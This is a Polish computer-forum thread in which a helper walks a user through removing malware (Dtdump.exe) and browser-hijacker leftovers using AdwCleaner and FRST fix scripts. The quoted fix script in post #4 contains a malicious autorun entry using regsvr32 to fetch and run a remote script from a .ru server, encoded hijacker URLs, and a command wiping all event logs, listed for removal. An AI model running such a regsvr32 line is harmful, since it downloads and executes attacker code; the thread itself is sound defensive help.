Witamy na forum PC Format Zapraszamy do REJESTRACJI


Użytkownicy przeglądający ten wątek: 1 gości

Queteex, Dtdump

#1
Queteex, Dtdump
Witam, mam jakąś pozostałość po paskudztwie Quoteex.exe i Dtdump.exe, po wczorajszym ataku. Po przeskanowaniu Eset scanner online sytuacja się poprawiła jednak ciągle otwierają mi się jakieś niechciane strony, nawet u Was kilkakrotnie. Po uruchomieniu komputera, proces Dtdump.exe zabiera 25% procesora, ale na szczęście daje się go zatrzymać.  Proszę o pomoc, jeśli to możliwe.
 System operacyjny: windows_seven Przeglądarka: chrome
#2
RE: Queteex, Dtdump
1) Użyj >Adw-cleaner

najpierw kliknij na SKANUJ (SCAN), a dopiero po zakończeniu skanowania, gdy uaktywni się przycisk USUŃ (CLEANING), to kliknij na niego.
Pokaż raport z niego "C".

2) Zrób logi z FRST > http://forum.pcformat.pl/WAZNE-Jak-zaloz...ec-WAZNE-t
Przed skanem zaznacz "Addition.txt" oraz "Shortcut.txt".
.
 System operacyjny: windows_seven Przeglądarka: seamonkey
#3
RE: Queteex, Dtdump
Wysyłam 2 logi z FRST i raport Adwcleanera, shortcut następnym postem, bo nie chciał się załączyć. Program dtdump.exe po ponownym uruchomieniu komputera znowu działa i zużywa 25%

Nie mogę załączyć i wysłać shotcut, bo przekroczyłem limit 500 kb


Załączone pliki
.txt   Addition_26-06-2018 17.56.13.txt (Rozmiar: 25,03 KB / Pobrań: 13)
.txt   FRST_26-06-2018 17.56.13.txt (Rozmiar: 35,79 KB / Pobrań: 88)
.txt   AdwCleaner[C0].txt (Rozmiar: 3,72 KB / Pobrań: 12)
 System operacyjny: windows_seven Przeglądarka: chrome
#4
RE: Queteex, Dtdump
zaraz to przejrzę ...


Cytat:Task: {811F5517-62CD-41E7-8F70-21E1B4E7957E} - System32\Tasks\HIGHVIEW => C:\Program Files\HIGHVIEW\HIGHVIEW.exe
Znasz to? Takiego programu nie ma na liście Twoich programów.

Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Kod:
Task: {AC224065-60B2-40D0-A38A-C144D96CB3EC} - System32\Tasks\szxul => C:\Users\Janusz\AppData\Roaming\semco\szxul.vbs [2018-06-25] ()
RemoveDirectory: C:\Users\Janusz\AppData\Roaming\semco
Task: {FB7DC121-B821-4A65-A683-6189B759E740} - System32\Tasks\{8CE72DD0-CF9C-45D7-BD07-259298F12F4D} => C:\Windows\system32\pcalua.exe -a C:\Users\Janusz\Downloads\super_cenzurka_v4100_selke.exe -d C:\Users\Janusz\Downloads
Task: {91249DC4-C207-40D6-AC7E-39C02677F771} - System32\Tasks\{9A0FB079-5EED-4510-8B5C-035A940F9DB4} => C:\Windows\system32\pcalua.exe -a "C:\Users\Janusz\Downloads\super_cenzurka_v4100_selke (2).exe" -d C:\Users\Janusz\Downloads
RemoveDirectory: C:\Users\Janusz\AppData\Roaming\dtdump
Startup: C:\Users\Janusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.lnk [2018-06-26]
ShortcutTarget: x.lnk -> C:\Users\Janusz\AppData\Roaming\eexJrDljdb.exe ()
C:\Users\Janusz\AppData\Roaming\eexJrDljdb.exe
C:\Users\Janusz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.lnk
HKU\S-1-5-21-2068573872-1790057853-1422518692-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.aserdefa.ru/restore.xml scrobj.dll <==== UWAGA
HKU\S-1-5-21-2068573872-1790057853-1422518692-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYozdWSeXr4ZG5MWE2qLdBr9WQm21J-atj_Yo0lWTy0qvD8DIzNEf9Wl8drFqTpGAYlMjRUAbh5Vi08rWwN9L-Kf8yEDnAvOECe--tH7h1jLrQu30bun_ZdttK_WDFeOPSnuUc8clQmEwxcB-q8zvHJpzUZGg,,&q={searchTerms}
HKU\S-1-5-21-2068573872-1790057853-1422518692-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGk3GzeHhcr-ccYozdWSeXr4ZG5MWE2qLdBr9WQm21J-atj_Yo0lWTy0qvD8DIzNEf9Wl8drFqTpGAYpaaRVcCtAw3YA-XUaqYQNqj32NOLQRseWNoUpu2rOek02jyfKrS5VmVX0KzyOkbNxRn03W0VCA05SY8TRQyi15mcCNw,,
S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X]
S4 IMFFilter; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\IMFFilter.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 MSICDSetup; \??\E:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\E:\NTIOLib_X64.sys [X]
S3 RegFilter; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys [X]
RemoveDirectory: C:\Users\Public\Documents\XMUpdate
2018-06-25 12:58 - 2018-06-25 12:58 - 007629312 _____ C:\Users\Janusz\AppData\Local\agent.dat
2018-06-25 12:58 - 2018-06-25 12:58 - 001988683 _____ C:\Users\Janusz\AppData\Local\OverRon.tst
2018-06-25 12:58 - 2018-06-25 12:58 - 000126464 _____ C:\Users\Janusz\AppData\Local\noah.dat
2018-06-25 12:58 - 2018-06-25 12:58 - 000070896 _____ C:\Users\Janusz\AppData\Local\Config.xml
2018-06-25 12:58 - 2018-06-25 12:58 - 000005568 _____ C:\Users\Janusz\AppData\Local\md.xml
2018-06-25 12:57 - 2018-06-25 15:28 - 000929792 _____ C:\Users\Janusz\AppData\Local\sham.db
2018-06-25 12:57 - 2018-06-25 12:57 - 000140800 _____ C:\Users\Janusz\AppData\Local\installer.dat
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:
Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

Zrób nowe logi FRST.
przed skanem zaznacz: Additional.txt Shortcut.txt,

Logi (tekst) wklejaj na http://wklejto.pl/, a w poście daj tylko linki.(czyli skopiuj adres z paska adresów)

.
 System operacyjny: windows_seven Przeglądarka: seamonkey
#5
RE: Queteex, Dtdump
http://www.wklejto.pl/576343
http://www.wklejto.pl/576345
http://www.wklejto.pl/576346
http://www.wklejto.pl/576347
 System operacyjny: windows_seven Przeglądarka: chrome
#6
RE: Queteex, Dtdump
Logi są zniekształcone.

Cytat:Logi (tekst) wklejaj na ...
Pisałem wyraźnie, żeby wklejać tam tekst (a nie plik!).

Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Kod:
Task: {811F5517-62CD-41E7-8F70-21E1B4E7957E} - System32\Tasks\HIGHVIEW => C:\Program Files\HIGHVIEW\HIGHVIEW.exe
2018-06-26 11:08 - 2018-06-26 11:08 - 000020825 _____ C:\Users\Janusz\Downloads\[agusiq-torrents.pl] - SpyHunter 4.26.12.4815 [ENG] [FULL] (1).torrent
2018-06-26 10:21 - 2018-06-26 10:21 - 000012198 _____ C:\Users\Janusz\Downloads\[agusiq-torrents.pl] - SpyHunter 4.28.5.4848  [PL] [FULL].torrent
2018-06-25 13:02 - 2018-06-25 22:35 - 000000000 ____D C:\Program Files (x86)\Jsk
2018-06-25 12:59 - 2018-06-25 12:59 - 000032038 _____ () C:\Users\Janusz\AppData\Local\uninstall_temp.ico
EmptyTemp:
Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

Jak oceniasz sytuację po tych usuwaniach?
 System operacyjny: windows_seven Przeglądarka: seamonkey
#7
RE: Queteex, Dtdump
http://www.wklejto.pl/576393 - Addition
http://www.wklejto.pl/576395 - FRST
http://www.wklejto.pl/576397 - Shortcut

Teraz już poprawnie najnowsze logi.
Jest dużo lepiej, zniknął ten program Dtdump.exe, który działał w procesach i zżerał procesor. Wielkie dzięki za szybką pomoc.
 System operacyjny: windows_seven Przeglądarka: chrome
#8
RE: Queteex, Dtdump
Cytat:Task: {811F5517-62CD-41E7-8F70-21E1B4E7957E} - System32\Tasks\HIGHVIEW => C:\Program Files\HIGHVIEW\HIGHVIEW.exe
Nie odpowiedziałeś na pytanie, czy znasz ten program.
Jego Zaplanowane Zadanie już usunąłem, ale pozostał jeszcze sam program.
Jeśli go nie znasz, to usuń go ręcznie.

Poza tym - powinno być OK.
 System operacyjny: windows_seven Przeglądarka: seamonkey
#9
RE: Queteex, Dtdump
Programu nie znam, nie ma go w panelu sterowania, ani Revo go nie widzi, nie bardzo wiem jak go usunąć. Znalazłem tylko 14 kb plik w (System32\Tasks\HIGHVIEW). Usunąć go stamtąd? Znalazłem też jakiś ślad w rejestrze pod ta nazwą
 System operacyjny: windows_seven Przeglądarka: chrome
#10
RE: Queteex, Dtdump
Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

Kod:
RemoveDirectory: C:\Program Files\HIGHVIEW
Task: {811F5517-62CD-41E7-8F70-21E1B4E7957E} - System32\Tasks\HIGHVIEW => C:\Program Files\HIGHVIEW\HIGHVIEW.exe
EmptyTemp:
Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).
 System operacyjny: windows_seven Przeglądarka: seamonkey
Programy: Polecane / Nowe / Inne




Skocz do:


Wybrane wątki (Queteex, Dtdump)
Wątek: Autor Odpowiedzi: Wyświetleń: Ostatni post
  Serwis a ochrona danych neah 6 3923 26.05.2019 11:42
Ostatni post: wlisik
  Włamanie (?) na FB, lajkowanie stron, dziwne cookies Jednaczuuu 5 3719 21.05.2019 17:12
Ostatni post: Jednaczuuu
  Dziwny folder w %appdata% brunojoker 1 3849 11.05.2019 18:17
Ostatni post: broda99
  Witam i proszę o sprawdzenie logów z hjakthis izydorber 6 3830 11.05.2019 16:20
Ostatni post: Officer Crabtree
  Problem z dllhost.exe McSamuraj 6 8431 19.04.2019 01:51
Ostatni post: gorm80
  samoczynne otwieranie się stron baro990 6 4422 14.04.2019 11:38
Ostatni post: baro990
  Samoistne włączanie się wiersza poleceń po starcie systemu dipladoks.org shivy 1 3918 12.04.2019 20:08
Ostatni post: morderca
  ESET Internet Security AtBroker.exe autostart JoseM 1 4215 10.04.2019 03:16
Ostatni post: Illidan
  Niebezpieczny niebezpiecznik ptosz 4 4438 03.04.2019 19:24
Ostatni post: ptrick
  Samoistne otwieranie niechcianych stron Google Chrome Cloud 6 4183 03.04.2019 13:47
Ostatni post: Cloud
  Samoistne włączanie się wiersza poleceń po starcie systemu dipladoks.org Corristo 6 7542 02.04.2019 21:35
Ostatni post: morderca
  Samoistne otwieranie niechcianych stron Google Chrome ZooMM 10 9405 19.03.2019 13:11
Ostatni post: ZooMM
  Po starcie systemu włącza się strona z wirusem maciek11991 4 7330 12.03.2019 20:23
Ostatni post: morderca
  Problem z usunięciem Pup.optional i dziwne powiadomienia Java zee84 4 1236 11.03.2019 21:12
Ostatni post: zee84
  Samoczynnie wyłączające się programy - nowy laptop Purrek 0 4533 09.03.2019 20:01
Ostatni post: Purrek